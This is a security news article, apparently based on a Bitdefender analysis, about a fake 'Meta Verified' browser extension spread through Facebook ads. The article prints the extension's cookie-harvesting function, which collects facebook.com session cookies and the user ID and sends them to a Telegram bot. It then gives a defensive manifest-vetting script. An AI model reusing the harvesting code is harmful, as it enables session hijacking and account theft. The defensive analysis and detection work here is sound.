Threat actors have launched a sophisticated malvertising campaign on Facebook that coerces unsuspecting users into installing a fake "Meta Verified" browser extension.
Promoted through seemingly legitimate video tutorials, these ads promise to unlock the coveted blue verification tick without paying Meta's subscription fee.
In reality, the extension is engineered to harvest sensitive user data, including session cookies, access tokens, and IP addresses.
By leveraging trusted platforms like Box.com for hosting, the attackers ensure high availability and evade simple URL-blocking defenses, making the scam appear both authentic and risk-free.
On closer inspection, the video tutorials accompanying the ads bear the fingerprints of Vietnamese-speaking threat actors, with narration and code comments written in Vietnamese.
The extension's code, although clumsily obfuscated and likely generated with an AI-assisted toolkit, still exfiltrates data effectively.
Bitdefender analysts identified use of the Facebook Graph API to query Business account information once valid access tokens are obtained, allowing the attackers to distinguish high-value corporate profiles from personal accounts.
Malicious browser extension ad (Source – Bitdefender)
Victims who follow the tutorial unwittingly grant the extension permission to read and export cookies from the facebook.com domain.
Once installed, the extension immediately invokes an exportCookies function that compiles every cookie into a formatted string before transmitting it to a Telegram bot controlled by the attackers.
Cookie export function (Source – Bitdefender)
To further enrich the stolen data, the malware queries an IP lookup service to append geolocation details, bolstering the data's marketability on underground forums.
Bitdefender researchers noted that variants of this extension include adjustable parameters for tick size and position, suggesting an automated pipeline for producing new campaign assets with minimal manual effort.
The modular design also supports automatic execution on Chrome startup, ensuring persistent data harvesting even if users disable and re-enable the extension.
Infection Mechanism Deep Dive
The core of the infection mechanism lies in the malicious extension's background script, which hooks into Chrome's cookies API to extract session tokens without triggering user prompts.
After installation, triggered by clicking an ad link, the extension uses chrome.cookies.getAll({ domain: "facebook.com" }, callback) to gather cookies.
Within the callback, it constructs the payload:
async function exportCookies() {
  chrome.cookies.getAll({ domain: "facebook.com" }, async cookies => {
    // Flatten every facebook.com cookie into "name=value;name=value;..."
    const cookieString = cookies.map(c => `${c.name}=${c.value}`).join(";");
    // c_user carries the victim's numeric Facebook account ID
    const userId = cookies.find(c => c.name === "c_user")?.value || "Unknown";
    // IP geolocation lookup; the endpoint URL is not reproduced in the write-up
    const ipInfo = await fetch("").then(r => r.json()).catch(() => ({}));
    // Field name reconstructed from the garbled template: ID, IP, then cookies
    const payload = `ID: ${userId}\nIP: ${ipInfo.ip || "Unknown"}\nCookies: ${cookieString}`;
    sendToTelegram(payload); // exfiltration to the attacker-controlled Telegram bot
  });
}
This streamlined approach bypasses many endpoint-based detections, while the use of legitimate domains for hosting and command-and-control reduces the likelihood of rapid takedown.
Security teams should monitor for abnormal cookie export activity and enforce rigorous extension vetting to defend against such industrialized malvertising threats.
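As an added example (not code from the Bitdefender write-up or from the extension), the following check is the kind of vetting rule that catches the permission profile this campaign depends on: the cookies API combined with host access to facebook.com and a background script. The host list, sample manifest and function names are constructed for illustration.

```javascript
// Added example, not the extension's code: flag a manifest whose permissions match
// the profile above (cookies API + facebook.com host access + background script).
const SESSION_HOSTS = ["facebook.com", "business.facebook.com"]; // assumption: tune per estate

// True if a Chrome match pattern such as "*://*.facebook.com/*" or
// "<all_urls>" grants access to `host`.
function patternCoversHost(pattern, host) {
  if (pattern === "<all_urls>" || pattern === "*://*/*") return true;
  const m = /^(\*|https?):\/\/([^/]+)\/.*$/.exec(pattern);
  if (!m) return false;
  const hostPat = m[2];
  if (hostPat === "*") return true;
  if (hostPat.startsWith("*.")) {
    const base = hostPat.slice(2);
    return host === base || host.endsWith("." + base);
  }
  return host === hostPat;
}

// Returns the findings for one manifest; an empty array means the manifest
// does not combine the capabilities the cookie-export script needs.
function vetManifest(manifest) {
  const perms = manifest.permissions || [];
  // MV2 lists host patterns under "permissions", MV3 under "host_permissions".
  const hosts = [
    ...(manifest.host_permissions || []),
    ...perms.filter(p => p === "<all_urls>" || p.includes("://")),
  ];
  const hasCookies = perms.includes("cookies");
  const coversSession = SESSION_HOSTS.some(h => hosts.some(p => patternCoversHost(p, h)));
  const bg = manifest.background || {};
  const hasBackground = Boolean(bg.service_worker || (bg.scripts && bg.scripts.length));
  const findings = [];
  if (hasCookies && coversSession) {
    findings.push("cookies permission plus host access to a session-bearing site");
  }
  if (hasCookies && coversSession && hasBackground) {
    findings.push("background script can call chrome.cookies.getAll with no user interaction");
  }
  return findings;
}

// Constructed sample manifest mirroring the permission set the write-up describes.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Meta Verified (constructed sample)",
  permissions: ["cookies", "storage"],
  host_permissions: ["*://*.facebook.com/*"],
  background: { service_worker: "background.js" },
};
```

Running vetManifest(SAMPLE_MANIFEST) returns both findings, while a manifest that lacks the cookies permission or a background script scores lower; the check belongs in the review step before an extension is allowed into an enterprise allowlist.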